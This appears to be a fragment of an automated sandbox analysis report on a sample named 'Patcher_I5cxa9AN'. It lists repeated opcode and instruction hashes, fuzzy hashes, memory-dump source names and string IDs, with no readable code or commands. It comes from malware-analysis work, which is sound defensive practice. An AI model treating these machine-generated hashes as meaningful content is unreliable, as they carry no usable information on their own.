                                                                                              • Opcode ID: 41e448a6d6d6fb08d3dfa502668704f9cb77ffc4fc4fc8076e1652eb40c2e687
                                                                                              • Instruction ID: b7607598400cebcc9fe1e34d90426be88e2f1b31bff1ed68c65fd7745395e493
                                                                                              • Opcode Fuzzy Hash: 41e448a6d6d6fb08d3dfa502668704f9cb77ffc4fc4fc8076e1652eb40c2e687
                                                                                              • Instruction Fuzzy Hash: 7581273765D6804BC3185A3C4C5139ABAA78BD7334F3EC32EE8B4CBBD2C55588168342
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: _1v3
                                                                                              • API String ID: 0-1362554921
                                                                                              • Opcode ID: 9ae8938a8cdface9266ea6b8c228e5b1b4617c2040abbe75408085c08ac6a0e9
                                                                                              • Instruction ID: 90e7b67e5b6a3a8899dbc45fb5f537271717e7990fdcd10a7b275121c0173ee3
                                                                                              • Opcode Fuzzy Hash: 9ae8938a8cdface9266ea6b8c228e5b1b4617c2040abbe75408085c08ac6a0e9
                                                                                              • Instruction Fuzzy Hash: CA51BE7260C3418BD324CF24C8997AB77F2AF96318F588A2CD4D99B781DB749409C793
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: _1v3
                                                                                              • API String ID: 0-1362554921
                                                                                              • Opcode ID: a6f0e059d6bda8166204609d96b75ea826604059642f37faf1e7fc1dd9c0091a
                                                                                              • Instruction ID: c7647b1fbb9c994b8003fd67c8757a914ebc3cef798d125419abf9b804454e00
                                                                                              • Opcode Fuzzy Hash: a6f0e059d6bda8166204609d96b75ea826604059642f37faf1e7fc1dd9c0091a
                                                                                              • Instruction Fuzzy Hash: DF51AE7260C3818FD324CF25C8983ABB7F2AF96318F588A5CD4D59B780DB748805C792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: G /t
                                                                                              • API String ID: 0-1522431024
                                                                                              • Opcode ID: 66b542d471f28fe0183a9228a8b2d4b628751d54609d4d95004ed6fff2d67f8f
                                                                                              • Instruction ID: b97ff9d5d9d6692e64f3511ba42bf7dbb8af1c51501ce5160d0f762cca63a21c
                                                                                              • Opcode Fuzzy Hash: 66b542d471f28fe0183a9228a8b2d4b628751d54609d4d95004ed6fff2d67f8f
                                                                                              • Instruction Fuzzy Hash: 9551A0BAE142059FCB08DF7CC9511FEBBB1AB4E324F248219D961E77B4C2359A058B51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: )
                                                                                              • API String ID: 0-2427484129
                                                                                              • Opcode ID: 4cf7d5833f620861527a56d47873d3a7a2cdc50790a478e7d9c3ff2574f5a63e
                                                                                              • Instruction ID: 16ce013a6c71094c7d0ceef455adbb0d1e7b7473401e63258c99912adf78d3c7
                                                                                              • Opcode Fuzzy Hash: 4cf7d5833f620861527a56d47873d3a7a2cdc50790a478e7d9c3ff2574f5a63e
                                                                                              • Instruction Fuzzy Hash: 1731077550C3819BD7198A34D8103AFBBF19BD3318F189A6ED1D2C3691E736C5068716
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              • Opcode ID: 6c396f148091cf66d3d12372f7fdbfda7f5f417f2a051450be5045630d7f5e5f
                                                                                              • Instruction ID: 8e8add26a8272c1b75083f3528e1f357eaabab41d23b643fba48806d11dcd753
                                                                                              • Opcode Fuzzy Hash: 6c396f148091cf66d3d12372f7fdbfda7f5f417f2a051450be5045630d7f5e5f
                                                                                              • Instruction Fuzzy Hash: 6321D371509314ABC3149F58C88166BBBB4EFC6328F20962DE968473D0D331E808CBA6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: u7
                                                                                              • API String ID: 0-1853804965
                                                                                              • Opcode ID: 1af4f403ae5c3b7eb109a870cb7570db7be06c43d6b1ef9ed4b43fd8f1685dad
                                                                                              • Instruction ID: 86920fa09bc2c8dd269eef34373bab527392e501715b34550ba0d2f9b6f0a778
                                                                                              • Opcode Fuzzy Hash: 1af4f403ae5c3b7eb109a870cb7570db7be06c43d6b1ef9ed4b43fd8f1685dad
                                                                                              • Instruction Fuzzy Hash: 0421FDB414C3809EE310CF698494B5FFBF2AB92358F94591CF1E45B691D379810ACB9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: A
                                                                                              • API String ID: 0-3554254475
                                                                                              • Opcode ID: 98055918ea6964e3edea30d893f2daf08581d9db16faa49e902e5e874b3238e9
                                                                                              • Instruction ID: 1a8ebe2389c4eef6529dcf6d0746947b6525e32cf4e11fb4ae87916598590961
                                                                                              • Opcode Fuzzy Hash: 98055918ea6964e3edea30d893f2daf08581d9db16faa49e902e5e874b3238e9
                                                                                              • Instruction Fuzzy Hash: 5D015AB081C3819FD3508F24949475BFBF0AB85318F441A2CE4C89B291D378C5098B4B
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 4e39a1ff6a2e56b4493e7b3a44782068597b05d9ba3c566bd05e54fa3156e8bf
                                                                                              • Instruction ID: dd94eecbe3cb1612000cb4a7ce24dc5f995270874f5f5440f8c954270a030915
                                                                                              • Opcode Fuzzy Hash: 4e39a1ff6a2e56b4493e7b3a44782068597b05d9ba3c566bd05e54fa3156e8bf
                                                                                              • Instruction Fuzzy Hash: 1FA001B4B412418BAB449E36A60920D3BB9BA576A570AC06AA515CA250EA288459AF02
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 976196d8889e128db30fd885f92fcd9255ba61dcbf4b52ad1bcba843e107f319
                                                                                              • Instruction ID: b3bf433f16a88a7479f5ef4abb895c97298b2e6d2fb7eec198c60969f62cddec
                                                                                              • Opcode Fuzzy Hash: 976196d8889e128db30fd885f92fcd9255ba61dcbf4b52ad1bcba843e107f319
                                                                                              • Instruction Fuzzy Hash: DB92E1B0515B419FD3A1CF3DC846793BFE9AB5A310F14495EE0AEC7342D7B9A4008BA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1506a9262e48f25c1fdec20f6fc6e63c7ae9dd442098639158d17a60077d8e4
                                                                                              • Instruction ID: 833b8663406836325227a78fc2bc9e2d6c7b412c34ab05c08d588f53e6bd365c
                                                                                              • Opcode Fuzzy Hash: e1506a9262e48f25c1fdec20f6fc6e63c7ae9dd442098639158d17a60077d8e4
                                                                                              • Instruction Fuzzy Hash: 1262E4B4A0D3409BE7108F25CC41B2BBBF2ABC631CF34462CE49597BA5D770A865CB56
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ce755633531150b381ec4f3d29951f3968e048259af3cc1297209a6fe45e272b
                                                                                              • Instruction ID: 5b797aa9c4bcf76250f809c38c7ede9a45454f95508d32de6db9033db0ab43d6
                                                                                              • Opcode Fuzzy Hash: ce755633531150b381ec4f3d29951f3968e048259af3cc1297209a6fe45e272b
                                                                                              • Instruction Fuzzy Hash: 57629E71619B808ED326CB3C8845397BFD2AB9A324F188B5DE0FA8B3D2C7756501C756
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 52defa49a2efe94790241eb5354884a262e4c00fdded988648661140eccd90bc
                                                                                              • Instruction ID: ca71f189c679be07113fba7c71f12f3b0cc728287b5681e21e517807f13db990
                                                                                              • Opcode Fuzzy Hash: 52defa49a2efe94790241eb5354884a262e4c00fdded988648661140eccd90bc
                                                                                              • Instruction Fuzzy Hash: 7B528270A08BC49FE335CF25C484387BBF1AB82318F294A1DD5E606ED2D379A596C752
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ebc788ddf36d68b054f3fa67564ff1c63a369b15a8f73e5236a6f12afa594899
                                                                                              • Instruction ID: 3f9b8aed07ac8ca5a6320ee3162cfa2f9d7c9b6e5a14184c39693fb8053aff67
                                                                                              • Opcode Fuzzy Hash: ebc788ddf36d68b054f3fa67564ff1c63a369b15a8f73e5236a6f12afa594899
                                                                                              • Instruction Fuzzy Hash: 4252F371508345CFC724DF18C0906AABBE1BFC8318F1A8A6DE8E957761D774E85ACB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1eb2685ece56cd739938806400f976a3706609e672e51a637c330400abbf2a27
                                                                                              • Instruction ID: 7b9446592ee10e6df2e76a35b7d160ce400b50bf75ca228ecb81af150c6c197f
                                                                                              • Opcode Fuzzy Hash: 1eb2685ece56cd739938806400f976a3706609e672e51a637c330400abbf2a27
                                                                                              • Instruction Fuzzy Hash: C422D232B083518BC325DE18D8806ABB3F1EFC531DF298A2DD9C59B785D734E4658B82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fae9a4efdf0ecc59773a09bb1569b8e6360600cc866893f83aa1a68f25f9e44d
                                                                                              • Instruction ID: b493bf877882d0a3923e17c4d86e41d31cf1c8ca1f0eddca8750ba91551b1444
                                                                                              • Opcode Fuzzy Hash: fae9a4efdf0ecc59773a09bb1569b8e6360600cc866893f83aa1a68f25f9e44d
                                                                                              • Instruction Fuzzy Hash: 0F32D5B5A04B408FD314DF38D485356BBF1BB46318F154A2CD4EA8BB92E735E51ACB82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 61d540fd0de228f13cc4ac682ffb586003d3aea63f0a257fefeb1850db32087a
                                                                                              • Instruction ID: cfef6313ebc889dcedbd93fc89fe820518d831cdeb73d9a945896f231a70b6c0
                                                                                              • Opcode Fuzzy Hash: 61d540fd0de228f13cc4ac682ffb586003d3aea63f0a257fefeb1850db32087a
                                                                                              • Instruction Fuzzy Hash: A93221B0915B108FC328CF29C59061ABBF1BF86714B654A2ED6A787FA0D736F446CB10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a5e159d89d4e02896eafee285450ec0e9e37aab90cfc90bc7be3094d8ba2ebdb
                                                                                              • Instruction ID: 96f368cb479d3a1bf32f93c6936fd7c1ddf40ad990107c50c86b0487a87e5b09
                                                                                              • Opcode Fuzzy Hash: a5e159d89d4e02896eafee285450ec0e9e37aab90cfc90bc7be3094d8ba2ebdb
                                                                                              • Instruction Fuzzy Hash: 4B22D1B56097818FD719CF2AC4A0712BFB2BF97308F28868CC8854FB5AD735A455CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8eb8dec21ed3fb27b012f51b3cbe17fb73393fd46d8ff0006025fb76c820bd09
                                                                                              • Instruction ID: 889406ff5a43468611d032b11ed5964c7a76e77b8369ba2e688e970552c91d0b
                                                                                              • Opcode Fuzzy Hash: 8eb8dec21ed3fb27b012f51b3cbe17fb73393fd46d8ff0006025fb76c820bd09
                                                                                              • Instruction Fuzzy Hash: 81123CB4904B40AFC361EF39D946797BFE8EB06350F104A2EE4FE87781D63161158BA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0d7249e0dedac1f7be8caaa106a75350f3e243a982cded9d98cf06ab2afb4e34
                                                                                              • Instruction ID: c9bfdc2a54498c184e6662b70783c875874e37d3992bdf571f2578939975bdf0
                                                                                              • Opcode Fuzzy Hash: 0d7249e0dedac1f7be8caaa106a75350f3e243a982cded9d98cf06ab2afb4e34
                                                                                              • Instruction Fuzzy Hash: 78E16975208341DFD320CF69C880A6BBBE1FF98204F54892DE5E587B61E375E949CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3171e9d05f3b1a16f03c2895ed8e9a5ad4d87918676f7198018a3975e781b9a7
                                                                                              • Instruction ID: b08177476a2a083f808289c452b3056a41aecc7c98d71ce04a52b241dac4f505
                                                                                              • Opcode Fuzzy Hash: 3171e9d05f3b1a16f03c2895ed8e9a5ad4d87918676f7198018a3975e781b9a7
                                                                                              • Instruction Fuzzy Hash: B3B115716183118BD3188F29C8A136BB7F1FF85318F298A2DE9C69B790D77C8915C786
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d7f614457c96ab578e0811f24d4e01ed8c559dc0e50099a3826d4bd35e63dc99
                                                                                              • Instruction ID: 8b6ceb4a1665408c38edb21d950f6ea59e00748a060fd3fbaa88b4a03155ce00
                                                                                              • Opcode Fuzzy Hash: d7f614457c96ab578e0811f24d4e01ed8c559dc0e50099a3826d4bd35e63dc99
                                                                                              • Instruction Fuzzy Hash: 71C1E67160D3914FC315CF29C49066EBBF2ABC9318F29866DE4E98B792DB30E805C752
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 11961e75226e01ba5a24de026f07cc11f114f54966f05d78d9765e799bb12a17
                                                                                              • Instruction ID: d606e7091697019abc00a245964d1d2336dbcc9d33685e3754a85986564ecf23
                                                                                              • Opcode Fuzzy Hash: 11961e75226e01ba5a24de026f07cc11f114f54966f05d78d9765e799bb12a17
                                                                                              • Instruction Fuzzy Hash: B6B10576A083204BD704DF24C89066BB7F1FF85718F2AA62CD8D99B791DB34E905C782
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 71ad701fdad1708596422a539cb2f13fff463eaa02db2a2084b8a871f630a588
                                                                                              • Instruction ID: 4138705d100b9aa3ddaf1aa46d8f610b563d41269fb8cb649936ce2c3346fce7
                                                                                              • Opcode Fuzzy Hash: 71ad701fdad1708596422a539cb2f13fff463eaa02db2a2084b8a871f630a588
                                                                                              • Instruction Fuzzy Hash: ACB1B175909301AFD711CF24DC40B1ABBF5EFD5319F248A2CF49893BA0EB3599698B42
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b985734ebcac7bb3ccb72c7e665c36fe19463abfc4ba62f5a50a96d2015ecf81
                                                                                              • Instruction ID: 98850ffbf23936b02ee649c5d6176d579cbacc2f6b4fad83fd7df333ea812027
                                                                                              • Opcode Fuzzy Hash: b985734ebcac7bb3ccb72c7e665c36fe19463abfc4ba62f5a50a96d2015ecf81
                                                                                              • Instruction Fuzzy Hash: B0A179B2A093104BD3188EA4DC9172B73B2EBD634CF39853CE8859B795D639DE058392
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4878d75df2f4cf38c6ae335ea42c675543f557861db56b7100a9841ace880328
                                                                                              • Instruction ID: 9c4d3da6438459c8af6cde8759161312597e52f75890837285daa3eca2c2cf9b
                                                                                              • Opcode Fuzzy Hash: 4878d75df2f4cf38c6ae335ea42c675543f557861db56b7100a9841ace880328
                                                                                              • Instruction Fuzzy Hash: EEC10772E086A18FD711CA7CC8807997FB25B87324F2DC3D9D4A46B7D6C2369806C7A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35475e71b97425901cd4effe6151f30153b0f972ba1ff6642650949cb1ee6fbb
                                                                                              • Instruction ID: bca6734ded03e780ffaba4b357a8bcda915328ea10050e3d6b68215fad4f4dd8
                                                                                              • Opcode Fuzzy Hash: 35475e71b97425901cd4effe6151f30153b0f972ba1ff6642650949cb1ee6fbb
                                                                                              • Instruction Fuzzy Hash: 4681E4715183008BD3149F28C862767B3F0EF82318F289A2CE4D28B7E1F7799555C796
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f47b85ec2c6d7235abdf968704e2fd8d4277f050bba349a318b23cfbe7d91b9f
                                                                                              • Instruction ID: 9b4a12fd530db0cd8df02f5a38c9b8e42c29efea3389362212f668172528a6ac
                                                                                              • Opcode Fuzzy Hash: f47b85ec2c6d7235abdf968704e2fd8d4277f050bba349a318b23cfbe7d91b9f
                                                                                              • Instruction Fuzzy Hash: 68C16BB2A487418FC320CF68CC967ABB7F1BB85318F09492DD1E9C6352E778A155CB06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 26016be9b063932f1adeefc85eacd714105cbf2bbac67ad15bcbeda117dabbb3
